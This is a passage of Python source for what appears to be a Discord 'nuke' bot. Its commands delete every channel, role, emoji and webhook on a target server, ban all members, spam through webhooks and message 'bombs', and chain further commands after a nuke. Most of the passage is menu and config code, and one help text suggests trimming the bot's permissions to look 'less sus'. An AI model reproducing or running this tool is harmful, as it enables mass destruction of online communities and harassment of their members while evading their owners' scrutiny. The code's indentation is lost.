'username': choice(settings['webhook_spam']['usernames']),
'content': choice(settings['webhook_spam']['contents']),
'avatar_url': choice(settings['webhook_spam']['pfp_urls'])
}
q.put((requests.post, webhook_targets[randrange(target_list_length)].url, _headers, payload))
elif len(args) > 0 and args[0].isdigit() and int(args[0]) <= webhooks_length:
for i in range(int(args[0])):
webhook_targets.append(webhooks.pop(randrange(webhooks_length)))
webhooks_length -= 1
loaded_length += 1
elif args[0] == 'list':
if len(args) < 2:
args.append('1')
await embed(ctx, args[1], 'Targets on attacking list', webhook_targets)
elif args[0] == 'offload':
webhook_targets = []
await log(ctx, f'All webhooks have been offloaded')
else:
for webhook in args:
webhook = containing(await selected_server.webhooks(), webhook)
if webhook is None:
await log(ctx, f'Unable to find webhook `{webhook}`.')
continue
webhook_targets.append(webhook)
loaded_length += 1
if args[0] != 'list' and args[0] != 'start' and args[0] != 'offload':
await log(ctx, f'`{str(loaded_length)}` has been loaded into the target list.')
except:
raise
else:
await log(ctx, f'Unable to find `{args[0]}` command in webhook scripts.')
######### Nukes #########
@commands.check(checkPerm)
@client.command(name='nuke')
async def nuke(ctx):
if not await hasTarget(ctx):
return
await log(ctx, f'A nuke has been launched to `{selected_server.name}`.')
tasks = [disableCommunityMode(ctx), deleteAllChannels(ctx), deleteAllRoles(ctx), banAll(ctx), deleteAllWebhooks(ctx), deleteAllEmojis(ctx)]
await asyncio.gather(*tasks)
if len(settings['after']) > 0:
if not isDM(ctx) and selected_server.id == ctx.guild.id:
ctx.message.channel = None
consoleLog(f'{Fore.BLUE}Running after commands...', True)
for command in settings['after']:
# Lol im so smart to think something like this would work
try:
ctx.message.content = settings['command_prefix'] + command
await client.process_commands(ctx.message)
except:
consoleLog(f'{Fore.RED}Command {Fore.YELLOW}"{settings["command_prefix"]}{command}" {Fore.RED}has failed to execute.', True)
pass
consoleLog(f'{Fore.GREEN}After commands completed.')
@commands.check(checkPerm)
@client.command(name='deleteAllRoles', aliases=['dar', 'dAllRoles'])
async def deleteAllRoles(ctx):
if not await hasTarget(ctx):
return
consoleLog(f'{Fore.YELLOW}Starting to delete all roles...', True)
for role in selected_server.roles:
q.put((requests.delete, f'https://discord.com/api/v8/guilds/{selected_server.id}/roles/{role.id}', headers, None))
q.join()
consoleLog(f'{Fore.GREEN}Finished deleting roles.', True)
@commands.check(checkPerm)
@client.command(name='deleteAllChannels', aliases=['dac', 'dAllChannels'])
async def deleteAllChannels(ctx):
if not await hasTarget(ctx):
return
consoleLog(f'{Fore.YELLOW}Starting to delete all types of channels...', True)
for channel in selected_server.channels:
q.put((requests.delete, f'https://discord.com/api/v8/channels/{channel.id}', headers, None))
q.join()
consoleLog(f'{Fore.GREEN}Finished deleting channels.', True)
@commands.check(checkPerm)
@client.command(name='deleteAllEmojis', aliases=['dae', 'dAllEmoji'])
async def deleteAllEmojis(ctx):
if not await hasTarget(ctx):
return
consoleLog(f'{Fore.YELLOW}Starting to delete all emojis...', True)
for emote in selected_server.emojis:
q.put((requests.delete, f'https://discord.com/api/v8/guilds/{selected_server.id}/emojis/{emote.id}', headers, None))
q.join()
consoleLog(f'{Fore.GREEN}Finished deleting emojis.', True)
@commands.check(checkPerm)
@client.command(name='deleteAllWebhooks', aliases=['daw', 'dAllWebhooks'])
async def deleteAllWebhooks(ctx):
if not await hasTarget(ctx):
return
consoleLog(f'{Fore.YELLOW}Starting to delete all webhooks...', True)
for webhook in await selected_server.webhooks():
q.put((requests.delete, f'https://discord.com/api/v8/webhooks/{webhook.id}', headers, None))
q.join()
consoleLog(f'{Fore.GREEN}Finished deleting webhooks.', True)
@commands.check(checkPerm)
@client.command(name='banAll')
async def banAll(ctx):
if not await hasTarget(ctx):
return
payload = {'delete_message_days':'0', 'reason': ''}
consoleLog(f'{Fore.YELLOW}Starting ban all...', True)
for member_ in selected_server.members:
if f'{member_.name}#{member_.discriminator}' in settings['ban_whitelist'] or str(member_.id) in settings['ban_whitelist']:
consoleLog(f'Ban skipped for {member_.name}#{member_.discriminator} -> in ban whitelist')
continue
q.put((requests.put, f'https://discord.com/api/v8/guilds/{selected_server.id}/bans/{member_.id}', headers, payload))
q.join()
consoleLog(f'{Fore.GREEN}Ban all completed.', True)
## Configuration command ##
@commands.check(checkPerm)
@client.command(name='config')
async def config(ctx, command=None, *, args=None):
global settings, settings_copy
async def embed_list(n, title, array):
if not n.isdigit() or (n := int(n) - 1) < 0:
await log(ctx, 'Bad page number.')
return
names = ''
item_length = len(array)
if item_length == 0:
return await ctx.send(f'{title} count: 0')
init_item = n * per_page
final_item = init_item + per_page
if init_item > item_length - per_page:
if init_item > item_length:
await ctx.send('Invalid page number.')
return
final_item = init_item + (item_length % per_page)
else:
final_item = init_item + per_page
for i in range(init_item, final_item, 1):
item = array[i]
if len(item) > 17:
item = item[:17] + '...'
names += f'{str(i+1)}) {item}\n'
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = title,
description = f'Total count: {str(item_length)}; color: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Items', value=names, inline=True)
embed.set_footer(text=f'{n+1}/{str(ceil(item_length / per_page))}\n' +
('Config is saved' if configIsSaved() else '(*)Config is not saved'))
await ctx.send(embed=embed)
if command is None:
status_list = []
features_list = []
temp = settings.copy()
features_list.append('bomb_messages')
if temp['bomb_messages']['random'] is None or len(temp['bomb_messages']['fixed']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
features_list.append('webhook_spam')
if len(temp['webhook_spam']['usernames']) == 0 or len(temp['webhook_spam']['pfp_urls']) == 0 or len(temp['webhook_spam']['contents']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
del temp['bomb_messages']
del temp['webhook_spam']
for feature in temp:
features_list.append(feature)
if settings[feature] is None or (type(settings[feature]).__name__ == 'list' and len(settings[feature]) == 0):
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'Nuking features',
description = f':white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Features', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'Use `{settings["command_prefix"]}config <feature>` to get more information about how to config that feature.\n\n`{settings["command_prefix"]}config save <file name>` to save the current config. If you save the config as `default.json` the bot next time will directly start with whatever is in that `.json` file.', inline=False)
embed.set_footer(text='Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
return
command = command.lower()
#################
# permissions #
#################
if command == 'permissions' or command == 'permission' or command == 'perms' or command == 'perm':
if args is None:
status_list = []
features_list = []
features_list.append('permissions')
if len(settings['permissions']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'Permissions list',
description = f'Permissions for using the bot are given to the users.\n\n:white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Features', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`permissions add <userTag or userID> [userTag or userID] [user...` - grant permissions to the given user(s)\n\n`permissions remove <line number> [line number] [line...` - remove line(s) from the list\n\n`permissions list [page number]` - list all users that are in the permission list', inline=False)
embed.set_footer(text=('Config is saved' if configIsSaved() else '(*)Config is not saved'))
await ctx.send(embed=embed)
else:
args = args.split()
def alreadyExisted(checkingID):
for userID_index in range(len(settings['permissions'])):
if settings['permissions'][userID_index] == checkingID:
return True, userID_index
return False, None
if args[0] == 'add':
del args[0]
for userID in args:
existed, checkedID_index = alreadyExisted(userID)
if existed:
await log(ctx, f'Failed to add `{settings["permissions"][checkedID_index]}`. Already existed the permission list.')
continue
else:
settings['permissions'].append(userID)
elif args[0] == 'remove':
if len(args) > 1:
del args[0]
offset = 1
initial_length = len(settings['permissions'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['permissions'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from bomb_messages fixed list.')
elif args[0] == 'list':
await embed_list(args[1] if len(args) > 1 else '1', 'permission list', settings['permissions'])
else:
await log(ctx, f'Unknown operation: `{args[1]}`')
#################
# bomb_messages #
#################
elif command == 'bomb_messages' or command == 'bomb_message' or command == 'bomb':
if args is None:
status_list = []
features_list = []
features_list.append('random')
if settings['bomb_messages']['random'] is None:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
features_list.append('fixed')
if len(settings['bomb_messages']['fixed']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'bomb_messages',
description = f'Config for all the bomb commands.\nWhen you run bomb commands like `{settings["command_prefix"]}channelbomb 100 fixed` the fixed is the type of word list you are going to use. In this case the word list is going to randomly pick texts from the "fixed" list.\n\n:white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Types', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`bomb_messages fixed add <command>` - add contents to the back of the list\n\n`bomb_messages fixed remove <line number> [line number] [line...` - remove line(s) from the list\n\n`bomb_messages fixed list [page number]` - list contents that are in the content list\n\n`bomb_messages random <character length>` - sets character length for bomb commands like `{settings["command_prefix"]}kaboom 100 b64`(b64 = base64) ', inline=False)
embed.set_footer(text='Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
args = args.split()
if args[0].lower() == 'random':
if len(args) > 1 and args[1].isdigit() and (1 <= (length := int(args[1])) <= 1024):
settings['bomb_messages']['random'] = length
await log(ctx, f'Random-message length has been set to `{str(length)}`.')
else:
await log(ctx, 'Please enter a positive integer that is between 1 and 1024.')
elif args[0].lower() == 'fixed':
if args[1] == 'add':
if len(args) > 2 and (1 <= len(text := ' '.join(args[2:])) <= 100):
settings['bomb_messages']['fixed'].append(text)
await log(ctx, f'Text added. Character length: `{str(len(text))}`.')
else:
await log(ctx, f'Please enter something that has 1 to 100 characters.')
elif args[1] == 'remove':
if len(args) > 2:
del args[0], args[0]
offset = 1
initial_length = len(settings['bomb_messages']['fixed'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['bomb_messages']['fixed'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from bomb_messages fixed list.')
elif args[1] == 'list':
await embed_list(args[2] if len(args) > 2 else '1', 'bomb_messages fixed list', settings['bomb_messages']['fixed'])
else:
await log(ctx, f'Unknown operation: `{args[1]}`')
else:
await log(ctx, f'Unable to find {args[0]} config.')
################
# webhook #
################
elif command == 'webhook_spam':
if args is None:
status_list = []
features_list = []
for feature in settings['webhook_spam']:
features_list.append(feature)
if len(settings['webhook_spam'][feature]) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'webhook_spam',
description = f'Using webhook to spam messages. To send a message from discord webhook it requires 3 items: usernames, profile picture, and contents. For profile picture you can only put an image URL or put `none` for no pfp.\n\n:white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Types', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`webhook_spam <type> add <command>` - add contents to the back of the list\n\n`webhook_spam <type> remove <line number> [line number] [line...` - remove line(s) from the list\n\n`webhook_spam <type> list [page number]` - list contents that are in the content list', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
args = args.split()
if args[0] == 'usernames' or args[0] == 'username':
if args[1] == 'add':
if len(args) > 2 and (0 < len(text := ' '.join(args[2:])) <= 32):
settings['webhook_spam']['usernames'].append(text)
await log(ctx, f'Text added. Character length: `{str(len(text))}`.')
else:
await log(ctx, f'Please enter something that has 1 to 32 characters.')
elif args[1] == 'remove':
if len(args) > 2:
del args[0], args[0]
offset = 1
initial_length = len(settings['webhook_spam']['usernames'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['webhook_spam']['usernames'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from usernames.')
elif args[1] == 'list':
await embed_list(args[2] if len(args) > 2 else '1', 'webhook_spam usernames list', settings['webhook_spam']['usernames'])
else:
await log(ctx, f'Unknown operation: `{args[1]}`')
elif args[0] == 'pfp_urls' or args[0] == 'pfp_url' or args[0] == 'pfp':
if args[1] == 'add':
if len(args) > 1 and args[2].lower() == 'none':
settings['webhook_spam']['pfp_urls'].append(None)
await log(ctx, f'No pfp item has been added')
elif len(args) > 1 and (text := ' '.join(args[1:]).startswith(('https://', 'http://'))):
settings['webhook_spam']['pfp_urls'].append(text)
await log(ctx, f'URL added.')
else:
await log(ctx, f'Please enter an **image URL**. Note: the link must start with http(s) protocals. Or enter `none` for no pfp.')
elif args[1] == 'remove':
if len(args) > 2:
del args[0], args[0]
offset = 1
initial_length = len(settings['webhook_spam']['pfp_urls'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['webhook_spam']['pfp_urls'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from pfp_urls.')
elif args[1] == 'list':
await embed_list(args[2] if len(args) > 2 else '1', 'webhook_spam pfp_urls list', settings['webhook_spam']['pfp_urls'])
else:
await log(ctx, f'Unknown operation: `{args[1]}`')
elif args[0] == 'contents' or args[0] == 'content':
if args[1] == 'add':
if len(args) > 1 and (0 < len(text := ' '.join(args[1:])) <= 2000):
settings['webhook_spam']['contents'].append(text)
await log(ctx, f'Text added. Character length: `{str(len(text))}`.')
else:
await log(ctx, f'Please enter something that has 1 to 2000 characters.')
elif args[1] == 'remove':
if len(args) > 2:
del args[0], args[0]
offset = 1
initial_length = len(settings['webhook_spam']['contents'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['webhook_spam']['contents'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from contents.')
elif args[1] == 'list':
await embed_list(args[2] if len(args) > 2 else '1', 'webhook_spam contents list', settings['webhook_spam']['contents'])
else:
await log(ctx, f'Unknown operation: `{args[1]}`')
else:
await log(ctx, f'Unknown type: `{args[0]}`')
elif command == 'after':
if args is None:
status_list = []
features_list = []
features_list.append('after')
if len(settings['after']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'After commands',
description = f'All the commands in this list will run after `{settings["command_prefix"]}nuke`. It can be disabled by adding "false" after the nuke command: `{settings["command_prefix"]}nuke false`.\n\n:white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Features', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`after add <command>` - add command to the back of the command list\n\n`after remove <line number> [line number] [line...` - remove line(s) in the command list\n\n`after insert <line number> <command>` - insert command after the given line. Note: use `insert 0 <command>` to insert the command to the first line\n\n`after list [page number]` - list commands that are in the command list', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
args = args.split()
if args[0] == 'add':
if len(args) > 1:
text = ' '.join(args[1:])
settings['after'].append(text)
await log(ctx, f'Command added. Character length: `{str(len(text))}`.')
else:
await log(ctx, f'Please enter the command you want to add after line `{len(settings["after"])}`.')
elif args[0] == 'remove':
if len(args) > 1:
del args[0]
offset = 1
initial_length = len(settings['after'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['after'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter the line(s) that you want to remove from after commands.')
elif args[0] == 'insert':
if len(args) > 2 and args[1].isdigit():
if not (0 <= (index := int(args[1])) <= len(settings['after'])) or len(settings['after']) == 0:
await log(ctx, f'Line `{args[1]}` doesn\'t exist.')
return
settings['after'].insert(index, ' '.join(args[2:]))
await log(ctx, f'Added command after line `{args[1]}`.')
else:
await log(ctx, 'Insert usage: `after insert <after line #> <command...>`')
elif args[0] == 'list':
await embed_list(args[1] if len(args) > 1 else '1', 'after command(s) list', settings['after'])
else:
await log(ctx, f'Unknown operation: `{args[0]}`')
elif command == 'bot_status':
if args is None:
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'bot_status',
description = f'Whenever the bot boots up, its status will be set to the given status.\n\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value=f'{settings["bot_status"]}', inline=True)
embed.add_field(name='Features', value='bot_status', inline=True)
embed.add_field(name='Usage', value='`bot_status <on start status>` - set the on-start status. Available on-start statuses are `online`, `offline`, `idle`, and `dnd` or `do_not_disturb`. By default it is set to `offline`.', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
if (args := args.lower()) in ['online', 'offline', 'idle', 'dnd', 'do_not_disturb']:
settings['bot_status'] = args
await log(ctx, f'On-start status has been set to `{args}`.')
else:
await log(ctx, 'Available on-start statuses are `online`, `offline`, `idle`, and `dnd` or `do_not_disturb`.')
elif command == 'bot_permission':
if args is None:
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'bot_permission',
description = f'If you are using a selfbot, then you don\'t have to do anything in this section. The bot_permission section is for the normal bot invite URL, which asks the person inviting the bot for permissions/roles (e.g. admin, server manager). The default is 2146958847, which asks for all permissions. If you want to make the bot less sus, you can remove the permissions that are not needed.\n\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Value', value=f'{settings["bot_permission"]}', inline=True)
embed.add_field(name='Features', value='bot_permission', inline=True)
embed.add_field(name='Usage', value='`bot_permission <value>` - set the permission value to the given number. Use this [permission calculator](https://wizbot.cc/permissions-calculator/?v=0) to help you calculate the value. Note: if you use that calculator, all you need to do is copy the number displayed at the top and then use this command.', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
if args.isdigit() and 0 <= int(args) <= 2146958847:
settings['bot_permission'] = args
await log(ctx, f'Bot permission has been set to `{args}`.')
else:
await log(ctx, 'Please enter a value between 0 and 2146958847.')
elif command == 'save':
def check(message: discord.Message):
return message.author.id == ctx.message.author.id
if args is None:
await log(ctx, f'You need to name the file. Use `{settings["command_prefix"]}save <file name>`.')
return
parent_dir = os.path.join(Path().absolute().__str__(), 'data')
config_path = os.path.join(parent_dir, args.translate(bad_filename_map))
if os.path.isfile(config_path):
await log(ctx, f'Configuration file named {args} already exists. Do you want to overwrite it? [Y/n]')
while True:
try:
msg = (await client.wait_for('message', check=check, timeout=10)).content.lower()
if msg == 'y' or msg == 'yes':
with open(config_path, 'w') as f:
f.write(json.dumps(settings))
break
elif msg == 'n' or msg == 'no':
await log(ctx, 'Saving cancelled.')
return
await log(ctx, 'Yes or no.')
except (asyncio.exceptions.TimeoutError, discord.ext.commands.errors.CommandInvokeError):
await log(ctx, "Took too long to answer.")
return
else:
if not os.path.isdir(parent_dir):
os.mkdir(parent_dir)
with open(config_path, 'w+') as f:
f.write(json.dumps(settings))
global settings_copy
settings_copy = deepcopy(settings)
await log(ctx, 'Finished saving.')
elif command == 'verbose':
if args is None:
status_list = []
features_list = []
# hard coding this because I don't think there's a better way to set the values.
features_list.append('Log response from requests')
if want_log_request:
status_list.append(':white_check_mark:')
else:
status_list.append(':x:')
features_list.append('Log messages in console')
if want_log_console:
status_list.append(':white_check_mark:')
else:
status_list.append(':x:')
features_list.append('Log messages in discord chat')
if want_log_message:
status_list.append(':white_check_mark:')
else:
status_list.append(':x:')
features_list.append('Log any errors')
if want_log_errors:
status_list.append(':white_check_mark:')
else:
status_list.append(':x:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'verbose',
description = f'Verbose is the log level. If you don\'t want some of these logs to spam rate-limit errors or whatever other errors the bot throws at you, you can disable them to reduce lag.\n\nCurrent verbose value: `{settings["verbose"]}`\n:white_check_mark: = Enabled\n:x: = Disabled\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Logs', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value='`verbose <value>` - enable and disable the logs. Subtract the values below from the current verbose value to disable the corresponding log(s); add them back to re-enable them. For example, to disable "Log any errors" subtract 8 from 15 to get 7 and use 7 as the new verbose value; to also disable "Log response from requests" subtract 1 from 7 to get 6. To enable them again, add 8 and 1 back to the current verbose value.\n\n`1` - Log response from requests\n`2` - Log messages in console\n`4` - Log messages in discord chat\n`8` - Log any errors.', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
if args.isdigit() and 0 <= (args := int(args)) <= 15:
settings['verbose'] = args
updateVerbose()
await log(ctx, f'Verbose has been set to `{args}`.')
else:
await log(ctx, 'You can only enter an integer between 0 and 15 (inclusive).')
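# A quick worked example of the verbose bitmask arithmetic described in the
# embed above (the values come from the usage text; `verbose` here is only
# illustrative):
# verbose = 15        # all four logs on (1 + 2 + 4 + 8)
# verbose -= 8        # turn off "Log any errors" -> 7
# verbose -= 1        # also turn off "Log response from requests" -> 6
# verbose += 8 + 1    # turn both back on -> 15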
elif command == 'ban_whitelist':
if args is None:
status_list = []
features_list = []
features_list.append('ban_whitelist')
if len(settings['ban_whitelist']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'Ban whitelist',
description = f'Ban whitelist is used to tell `{settings["command_prefix"]}banAll` and `{settings["command_prefix"]}nuke` not to ban the users in the list. You can put a discord tag or discord ID in the list, but discord IDs are recommended because in the past some discord tags have been uncheckable.\n\n:white_check_mark: = Ready to use\n:x: = Needs configuring\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Features', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value='`ban_whitelist add <user>` - add a user to the back of the ban whitelist\n\n`ban_whitelist remove <line number> [line number]...` - remove line(s) from the ban whitelist\n\n`ban_whitelist list [page number]` - list users that are in the ban whitelist', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
args = args.split()
if args[0] == 'add':
if len(args) > 1:
text = ' '.join(args[1:])
settings['ban_whitelist'].append(text)
await log(ctx, f'User added. Character length: `{str(len(text))}`.')
else:
await log(ctx, f'Please enter the userID or userTag that you want to add after line `{len(settings["ban_whitelist"])}`.')
elif args[0] == 'remove':
if len(args) > 1:
del args[0]
offset = 1
initial_length = len(settings['ban_whitelist'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['ban_whitelist'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {initial_length}.')
await log(ctx, f'Successfully removed `{offset - 1}` items.')
else:
await log(ctx, 'Enter the line(s) to remove from the ban whitelist.')
elif args[0] == 'list':
await embed_list(args[1] if len(args) > 1 else '1', 'ban whitelist', settings['ban_whitelist'])
else:
await log(ctx, f'Unknown operation: `{args[0]}`')
elif command == 'proxies':
await log(ctx, 'This feature has been disabled for now due to unhandled slow/bad proxies.')
elif command == 'prefix' or command == 'command_prefix':
if args is None:
await log(ctx, f'Use `` {command_prefix}config command_prefix <command_prefix> ``')
else:
settings['command_prefix'] = client.command_prefix = args
await log(ctx, 'Command prefix changed.')
elif command == 'token':
if args is None:
await log(ctx, 'Usage: `token <new token>` - set a new token for this config. A restart of the bot will be required; remember to save the config before restarting.')
else:
settings['token'] = args
await log(ctx, 'New token has been set.')
else:
await log(ctx, f'Unable to find config `{command}`.')
## Additional functions ##
@commands.check(checkPerm)
@client.command(name='checkRolePermissions', aliases=['check', 'crp'])
async def checkRolePermissions(ctx, name, n='1'):
if not await hasTarget(ctx):
return
if not n.isdigit() or (n := int(n) - 1) < 0:
await log(ctx, 'Bad page number.')
return
member_ = containing(selected_server.members, nameIdHandler(name))
if member_ is None:
await log(ctx, f'Unable to find {name}.')
return
value = member_.guild_permissions.value
temp = sorted(member_.guild_permissions, key=lambda p: p)
master_list = ''
item_length = 31
init_item = n * per_page
final_item = init_item + per_page
if init_item > item_length - per_page:
if init_item > item_length:
await ctx.send('Invalid page number.')
return
final_item = init_item + (item_length % per_page)
else:
final_item = init_item + per_page
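# Worked example of the paging math above, assuming per_page = 10 (per_page
# is defined elsewhere in this file) and item_length = 31 permission flags:
# page 4 gives init_item = 3 * 10 = 30; since 30 > 31 - 10, the last page is
# short and final_item = 30 + (31 % 10) = 31, so only the final flag is shown.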
for i in range(init_item, final_item, 1):
item, has_perm = temp[i]
if has_perm:
master_list += ':white_check_mark: '
else:
master_list += ':x: '
master_list += item.replace('_', ' ').capitalize() + '\n'
# if not isDM(ctx) and ctx.guild.id == selected_server.id and 1 << 11 & selected_server.me.guild_permissions.value == 0:
# consoleLog('\n%s*Check role permissions*\n%sPermission value -> %s%d : 2147483647\n%s %s%d/%d' % (Fore.CYAN, Fore.RESET, Fore.YELLOW, value, master_list.replace(':white_check_mark:', f'{Fore.GREEN}+').replace(':x:', f'{Fore.RED}-'), Fore.YELLOW, n+1, ceil(item_length / per_page)), True)
# else:
try:
embed = discord.Embed(
title = 'User permissions',
description = f'Encoded value: {str(value)} : 2147483647',
color = discord.Color.red()
)
embed.add_field(name='Permissions', value=master_list, inline=True)
embed.set_footer(text=f'{str(n+1)}/{str(ceil(item_length / per_page))}')
await ctx.send(embed=embed)
except Exception:
await ctx.send('```diff\n%s %d/%d```' % (master_list.replace(':white_check_mark:', '+').replace(':x:', '-'), n+1, ceil(item_length / per_page)))
@commands.check(checkPerm)
@client.command(name='serverIcon', aliases=['si', 'changeServerIcon'])
async def serverIcon(ctx, path=None):
if not await hasTarget(ctx):
return
if path is None:
await selected_server.edit(icon=None)
await log(ctx, f'Successfully removed the server icon from `{selected_server.name}`.')
elif path.startswith(('https://', 'http://', 'ftp://', 'ftps://')): # Link EX: https://www.example.com/aaa.png
try:
await selected_server.edit(icon=BytesIO(requests.get(path).content).read())
consoleLog('Successfully changed the current server icon.')
except Exception:
consoleLog(f'Unable to change the server icon to "{path}".')
elif path[0] == '<': # EX: <a:triggeredd:627060014431076352>
path = path.split(':')
try:
if path[0] == '<a': # Animated
await selected_server.edit(icon=discord.File(BytesIO(requests.get(f'https://cdn.discordapp.com/emojis/{path[2][:-1]}.gif?v=1').content).read()))
else:
await selected_server.edit(icon=BytesIO(requests.get(f'https://cdn.discordapp.com/emojis/{path[2][:-1]}.png?v=1').content).read())
await log(ctx, 'Successfully changed server icon.')
except:
raise
elif os.path.isfile(path): # File EX: C:\Users\user\Desktop\something.jpg or EX: .\icon\something.jpg
with open(path, 'rb') as data:
await selected_server.edit(icon=data.read())
await log(ctx, 'Successfully changed server icon.')
else:
try:
unicode_number = str(ord(path)) + ', '
except Exception:
unicode_number = ''
unicode_string = path.encode('utf8')
sys.stdout.buffer.write(f'"{path}" is not supported to be set as a server icon.'.encode('utf8'))
consoleLog(unicode_number)
await log(ctx, f'{path} is not supported to be set as a server icon.')
await log(ctx, f'Character\'s bytes: {unicode_number}{unicode_string}')
@commands.check(checkPerm)
@client.command(name='serverName', aliases=['sn', 'changeServerName'])
async def serverName(ctx, *, name):
if not await hasTarget(ctx):
return
try:
await selected_server.edit(name=name)
await log(ctx, f'Server name has been changed to `{name}`.')
except discord.errors.Forbidden:
await log(ctx, 'Unable to change server name.')
raise
@commands.check(checkPerm)
@client.command(name='purge', aliases=['clear'])
async def purge(ctx, n=None):
if not await hasTarget(ctx):
return
consoleLog('Purging messages...', True)
if n is not None and (not n.isdigit() or (n := int(n)) < 1):
await log(ctx, 'Please enter a positive integer.')
return
to_delete_messages = await ctx.channel.history(limit=n).flatten()
consoleLog('Due to Discord rate limiting, purging messages cannot run at a fast pace. After each deleted message the bot waits for the delay Discord specifies.', True)
delay_time = 0
for message in to_delete_messages:
while True:
await asyncio.sleep(delay_time)
